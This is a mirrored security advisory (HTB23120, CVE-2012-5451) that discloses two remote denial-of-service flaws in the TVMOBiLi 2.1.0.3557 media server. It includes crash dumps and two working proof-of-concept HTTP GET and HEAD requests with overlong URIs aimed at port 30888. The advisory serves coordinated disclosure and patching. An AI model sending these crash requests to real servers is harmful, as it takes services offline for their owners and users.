Skip to content
cyberexploits
doswindowstext

TVMOBiLi 2.1.0.3557 - Denial of Service

TVMOBiLi 2.1.0.3557 - Denial of Service

Publié le 2012-12-09

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/windows/dos/23254.txt7eac4c3a
raw
Advisory ID: HTB23120

Product: TVMOBiLi media server

Vendor: TVMOBiLi

Vulnerable Version(s): 2.1.0.3557 and probably prior version

Tested Version: 2.1.0.3557 in Windows XP SP3 32 bits

Vendor Notification: October 15, 2012 

Vendor Patch: November 21, 2012 

Public Disclosure: December 5, 2012 

Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130]

CVE Reference: CVE-2012-5451

CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

Solution Status: Fixed by Vendor

Risk Level: Medium 

Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 



-----------------------------------------------------------------------------------------------



Advisory Details:



High-Tech Bridge Security Research Lab has discovered 2 remote DoS vulnerabilities in TVMOBiLi Media server, which could be exploited to crash remote server with malicious HTTP requests.



1) Improper Handling of Length Parameter Inconsistency in TVMOBiLi: CVE-2012-5451



1.1 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters long to 30888/TCP port (default TVMOBiLi's server port) and cause a stack-based buffer overrun that will crash tvMobiliService service.



Crash details





MSVCR100.dll:78abe2ad mov [edx], al from thread 1860 caused access violation when attempting to write to 0x0170e000

CONTEXT DUMP

  EIP: 78abe2ad mov [edx],al

  EAX: 00b8fd3e (  12123454) -> injected stream (stack)

  EBX: 00000019 (        25) -> N/A

  ECX: 00b8f8d0 (  12122320) -> ppB;p$= @==ypp N/A

  EDI: 00b8f8d0 (  12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)

  EBP: 00b8f61c (  12121628) -> sx xx'(x(x0kxxT$|$| (stack)

  ESP: 00b8f60c (  12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)

  +00: 78abe2ff (2024530687) -> N/A

  +04: 00000000 (         0) -> N/A

  +08: 0000011f (       287) -> N/A

  +0c: 00000002 (         2) -> N/A

  +10: 00b8f8ac (  12122284) -> Aax$=pppB;p$= @==ypp N/A



disasm around:

  0x78abe28e jnc 0x78abe2f9

  0x78abe290 outsb

  0x78abe292 and fs:[eax],al

  0x78abe296 test byte [ecx+0xc],0x40







Proof of Concept

The following HTTP GET request will crash vulnerable tvMobiliService service remotely:





GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1

HOST: 192.168.10.12:30888

Referer: 192.168.10.12:30888

ACCEPT: */*

Accept-Encoding: None

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Connection: Close

Accept-Transfer-Encoding: None







1.2 The vulnerability exists due to improper handling of URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of 255, 257 or 260 characters long to 30888/TCP port and cause a stack-based buffer overrun that will crash tvMobiliService service.



Crash details



MSVCR100.dll:78abe2ad mov [edx], al from thread 1745 caused access violation when attempting to write to 0x0170e000



CONTEXT DUMP

  EIP: 78abe2ad mov [edx],al

  EAX: 00b8fd3e (  12123454) -> injected stream (stack)

  EBX: 00000019 (        25) -> N/A

  ECX: 00b8f8d0 (  12122320) -> ppB;p$= @==ypp N/A

  EDI: 00b8f8d0 (  12122320) -> ppB;p$= @==ypp sx xx'(x(x0kxxT$|$| (stack)

  EBP: 00b8f61c (  12121628) -> sx xx'(x(x0kxxT$|$| (stack)

  ESP: 00b8f60c (  12121612) -> xnx|8xx|8xp+| ==sx xx' (stack)

  +00: 78abe2ff (2024530687) -> N/A

  +04: 00000000 (         0) -> N/A

  +08: 0000011f (       287) -> N/A

  +0c: 00000002 (         2) -> N/A

  +10: 00b8f8ac (  12122284) -> Aax$=pppB;p$= @==ypp N/A



disasm around:

  0x78abe28e jnc 0x78abe2f9

  0x78abe290 outsb

  0x78abe292 and fs:[eax],al

  0x78abe296 test byte [ecx+0xc],0x40







Proof of Concept

The following HTTP HEAD request will crash vulnerable tvMobiliService service remotely:





HEAD /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1

HOST: 192.168.10.12:30888

Referer: 192.168.10.12:30888

ACCEPT: */*

Accept-Encoding: None

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Connection: Close

Accept-Transfer-Encoding: None









-----------------------------------------------------------------------------------------------



Solution:



Upgrade to TVMOBiLi 2.1.0.3974



More Information:

http://forum.tvmobili.com/viewtopic.php?f=7&t=55117

http://dev.tvmobili.com/changelog.php



-----------------------------------------------------------------------------------------------



References:



[1] High-Tech Bridge Advisory HTB23120 - https://www.htbridge.com/advisory/HTB23120 - TvMobili Media Server Multiple Remote DoS Vulnerabilities.

[2] TVMOBiLi LTD - http://www.tvmobili.com - TVMOBiLi is a free Media server for Mac, Windows, and Linux Operating Systems.

[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 



-----------------------------------------------------------------------------------------------



Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Voir sur GitHub